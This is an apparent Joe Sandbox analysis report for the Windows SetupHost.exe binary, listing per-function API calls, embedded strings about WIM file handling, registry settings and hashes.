                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDA0223208C30CE3020002C22808C3333AEC0C0222B0000E0EA000222088B2A802C0C0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000020,?,00000000), ref: 009DE30B
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 009DE369
                                                                                                                                                                                                                  • Part of subcall function 009DDFE4: SetLastError.KERNEL32(00000006,?,00000000,00000000,009DE358,?,?,00000000), ref: 009DE003
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 009DE361
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000), ref: 009DE431
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000), ref: 009DE459
                                                                                                                                                                                                                • FlushFileBuffers.KERNEL32(00000000), ref: 009DE4B2
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009DE4BC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009DE516
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DE51D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 009DE54A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DE551
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009DE5E2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DE5E9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009DE606
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DE60D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009DE620
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DE627
                                                                                                                                                                                                                • memset.MSVCRT ref: 009DE64A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 009DE654
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DE65B
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 009DE666
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: GetProcessHeap.KERNEL32(00000008,00000168,?,00000000,00000000,?,?,00000000), ref: 009E1F0B
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 009E1F12
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: memset.MSVCRT ref: 009E1F2D
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 009E1F54
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 009E1F66
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: UuidCreate.RPCRT4(00000008), ref: 009E1F8B
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(00000104,00000000), ref: 009E1FA3
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(0000011C,00000000), ref: 009E1FB4
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(00000134,00000000), ref: 009E1FC8
                                                                                                                                                                                                                  • Part of subcall function 009E1EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000), ref: 009E1FDA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$Process$Free$CountCriticalInitializeSectionSpin$Create$Eventmemset$AllocBuffersFileFlushUuid
                                                                                                                                                                                                                • String ID: Fail to flush file buffers$Fail to read WIM header$Fail to update WIM header$The existing WIM file became corrupted$WIMCloseWIM
                                                                                                                                                                                                                • API String ID: 1391722268-2486278283
                                                                                                                                                                                                                • Opcode ID: 9aefedf4d70269c35c5904403630f0c9db0f4867dfef62ef9109fbccd298759a
                                                                                                                                                                                                                • Instruction ID: 738c75c1a64d0a4c8a629450049607370bd96b6d8537e91d460759590a7a4ef1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aefedf4d70269c35c5904403630f0c9db0f4867dfef62ef9109fbccd298759a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5591C030784241A7DB1ABBB25C5AB7E656E6FC4744F08845AF9029B2E2DF78CC029691
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,00A00A23,?), ref: 00A005A7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A005AE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000011,?,00A00A23,?), ref: 00A005BA
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A005C1
                                                                                                                                                                                                                • strrchr.MSVCRT ref: 00A005E7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,00A00A23,?), ref: 00A00613
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A0061A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A00A23,?), ref: 00A00654
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A0065B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A00A23,?), ref: 00A0069B
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A006A2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A00A23,?), ref: 00A006DE
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A006E5
                                                                                                                                                                                                                • strrchr.MSVCRT ref: 00A00710
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00A0073B
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000), ref: 00A00742
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 00A0077D
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000), ref: 00A00784
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 00A007BF
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000), ref: 00A007C6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess$strrchr
                                                                                                                                                                                                                • String ID: || LogMessage: $ || SourceFunction: $ || SourceName: $C:\$Windows.~WS\Sources\SetupHost.Exe$ExecutableName:
                                                                                                                                                                                                                • API String ID: 337399512-1888139173
                                                                                                                                                                                                                • Opcode ID: 07e27a6e4035390123c2c713f6a24c7cdc56b28cf73209e6e0457445dcd7f271
                                                                                                                                                                                                                • Instruction ID: d811ce2ad15b8b71293c4b0f9e3152556fa5974be3fa1cdd8470926be3ec698a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e27a6e4035390123c2c713f6a24c7cdc56b28cf73209e6e0457445dcd7f271
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09811B76A04705AFDF05CFA4A894BFFBBB6EF49300F148258ED469B241C6766D06CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,00000000), ref: 009DF213
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DF26F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DF3DA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF3E1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DF3EF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF3F6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DF406
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF40D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 009DF41C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF423
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DF433
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF43A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DF453
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF45A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 009DF472
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF479
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 009DF488
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DF48F
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000,00000000), ref: 009DF4A7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$ErrorLastTime$FileSystem
                                                                                                                                                                                                                • String ID: %I64u$0x%08X$WIM\IMAGE[*]\CREATIONTIME\HIGHPART$WIM\IMAGE[*]\CREATIONTIME\LOWPART
                                                                                                                                                                                                                • API String ID: 1882856403-1289715265
                                                                                                                                                                                                                • Opcode ID: 277c58b84bdad8d8dccc34c8bff4fb8e40bb17259275819536461d9788af7452
                                                                                                                                                                                                                • Instruction ID: ec11ee20857922b375c6e3cb260775528ed944cf57a7bc2e9b7ac3f28c9ea75d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 277c58b84bdad8d8dccc34c8bff4fb8e40bb17259275819536461d9788af7452
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00A15C75E40219ABCF11DFE4CD5ABEEBBB9AF48744F148066F902E7251D7349D018B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 009EBC52
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EBC68
                                                                                                                                                                                                                • memset.MSVCRT ref: 009EBCEA
                                                                                                                                                                                                                  • Part of subcall function 009EB3BA: GetProcessHeap.KERNEL32(00000008,00000054), ref: 009EB3E2
                                                                                                                                                                                                                  • Part of subcall function 009EB3BA: HeapAlloc.KERNEL32(00000000), ref: 009EB3E9
                                                                                                                                                                                                                  • Part of subcall function 009EB3BA: GetLastError.KERNEL32 ref: 009EB3F8
                                                                                                                                                                                                                  • Part of subcall function 009EB3BA: GetLastError.KERNEL32 ref: 009EB40E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,; hash = ,00000001), ref: 009EBD58
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EBD5F
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 009EBD65
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EBD7B
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,4A200000,009EC260,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 009EBE53
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EBE69
                                                                                                                                                                                                                  • Part of subcall function 009E4E52: GetLastError.KERNEL32(00000000), ref: 009E4FDD
                                                                                                                                                                                                                  • Part of subcall function 009E4E52: GetProcessHeap.KERNEL32(00000000,?), ref: 009E52B4
                                                                                                                                                                                                                  • Part of subcall function 009E4E52: HeapFree.KERNEL32(00000000), ref: 009E52BB
                                                                                                                                                                                                                  • Part of subcall function 009E4E52: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E52C8
                                                                                                                                                                                                                  • Part of subcall function 009E4E52: HeapFree.KERNEL32(00000000), ref: 009E52CF
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EBEDC
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EBEEE
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EBF61
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EBF6F
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,00000000,?,?,000003E8,00000002,?,?,WIMCopyFileEx failed,80004005,ResExtract,00000260), ref: 009EBFB5
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,000003E8,00000002,?,?,WIMCopyFileEx failed,80004005,ResExtract,00000260), ref: 009EBFD3
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000003E8,00000002,?,?,WIMCopyFileEx failed,80004005,ResExtract,00000260), ref: 009EBFE9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$Heap$ProcessStatus$Free$AllocSleepmemset
                                                                                                                                                                                                                • String ID: ; hash = $DecompressChunkedFile failed$ResExtract$UncompressFile failed$WIMCopyFileEx failed$failed to extract file from reference extension
                                                                                                                                                                                                                • API String ID: 3644150823-1675921281
                                                                                                                                                                                                                • Opcode ID: cd230f30ac5f682335218103bfd27f3464f1ae3cd1bd1424bea6686c382f277c
                                                                                                                                                                                                                • Instruction ID: 0250bd10574eb0acc9a9b854e76c173c7ae7ece51bfdd37579fdb140d3b46b30
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd230f30ac5f682335218103bfd27f3464f1ae3cd1bd1424bea6686c382f277c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F1F871A00269ABDF22DF96CC89BEBB775EF44310F144598F909A7291DB349D81CF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E9336
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000010,?,00000000,00000000,00000000,00000000), ref: 009E93E7
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,009EA8AA,?), ref: 009E93FF
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 009E9493
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 009E94F3
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009EA8AA), ref: 009E94FA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 009E9607
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E960E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 009E9745
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E974C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ErrorFreeLast$Alloc__aulldivmemset
                                                                                                                                                                                                                • String ID: ParseChunkRegionInternal
                                                                                                                                                                                                                • API String ID: 71407944-2127954582
                                                                                                                                                                                                                • Opcode ID: fdc22a4e84464adc31b62d8947fb3facd1e7e6db675c1149ac74a2182ff5e941
                                                                                                                                                                                                                • Instruction ID: 33848f928a545d2a1ec969b2ca2af729aae241bf5687c95d9f0c349c0dc598e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdc22a4e84464adc31b62d8947fb3facd1e7e6db675c1149ac74a2182ff5e941
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D19071B003599BDB15CFAAC885BAEB7B8FB48710F108529F915EB391EB749C018F90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(80000002,00000425,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00A09AC7
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(000F003F,00000015,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00A09AFC
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,0000021D,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00A09B20
                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 00A09B57
                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 00A09B78
                                                                                                                                                                                                                • RegDeleteTreeW.ADVAPI32(?,Settings), ref: 00A09B90
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,Settings,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00A09BBE
                                                                                                                                                                                                                • RegDeleteTreeW.ADVAPI32(?,QueryParameters), ref: 00A09BEA
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,QueryParameters,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 00A09C11
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A09C53
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A09C61
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A09C6F
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A09C7D
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A09C8B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreate$DeleteTreeValue
                                                                                                                                                                                                                • String ID: ETag$QueryParameters$RefreshInterval$Settings
                                                                                                                                                                                                                • API String ID: 4213054534-3134423153
                                                                                                                                                                                                                • Opcode ID: 8cd051855ec1143bc3496784f4abf581518448ac54d27657a3c7f541c6e9ca7d
                                                                                                                                                                                                                • Instruction ID: 2023710a8ff994b6c6bdd67f912b971d52ad17ec3522a5694416bd5564258ae5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd051855ec1143bc3496784f4abf581518448ac54d27657a3c7f541c6e9ca7d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E517E72D0262EFFDB229B94EC85DFFB77DEB04794B014165F902B6191DB309E019AA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009BA517
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BA521
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 009BA548
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 009BA551
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BA562
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009BA569
                                                                                                                                                                                                                • InitializeAcl.ADVAPI32(00000000,?,00000002), ref: 009BA582
                                                                                                                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,?), ref: 009BA597
                                                                                                                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,?), ref: 009BA5AA
                                                                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 009BA5BE
                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 009BA5D5
                                                                                                                                                                                                                • CreateMutexW.KERNEL32(?,00000000,?), ref: 009BA5FD
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BA60E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009BA644
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BA651
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BA658
                                                                                                                                                                                                                • FreeSid.ADVAPI32(00000000,?,00000000), ref: 009BA667
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BA678
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BA67F
                                                                                                                                                                                                                  • Part of subcall function 009BBE1C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BBFAC
                                                                                                                                                                                                                  • Part of subcall function 009BBE1C: HeapFree.KERNEL32(00000000), ref: 009BBFB3
                                                                                                                                                                                                                  • Part of subcall function 009BBE1C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BBFC0
                                                                                                                                                                                                                  • Part of subcall function 009BBE1C: HeapFree.KERNEL32(00000000), ref: 009BBFC7
                                                                                                                                                                                                                  • Part of subcall function 009BBE1C: CloseHandle.KERNEL32(000000FF), ref: 009BBFDA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$Initialize$AccessAllowedCloseDescriptorErrorHandleLastLengthSecurity$AllocAllocateCreateDaclMutex
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3721674393-0
                                                                                                                                                                                                                • Opcode ID: eaa5d59d67a177230c04dd3353daf321cae720634a1d1f80be7e2238de67c091
                                                                                                                                                                                                                • Instruction ID: 8c90d38bbf336d3e4eedf3005eb9e7ff5825e1e5ee3460640930a44a642759e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaa5d59d67a177230c04dd3353daf321cae720634a1d1f80be7e2238de67c091
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A516A71A00309ABDB20DFE5DD49BEEBBB9FF88710F148429F505E7290DB749A018B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: GetProcessHeap.KERNEL32(?,00100010,00000000,?,00000001,?,?,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D22
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: HeapAlloc.KERNEL32(00000000,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D29
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: GetProcessHeap.KERNEL32(00000001,00100010,00000000,?,00000001,?,?,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D75
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: HeapAlloc.KERNEL32(00000000,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D7C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 009ED2B7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009ED2CA
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 009ED391
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009ED3A4
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 009ED53B
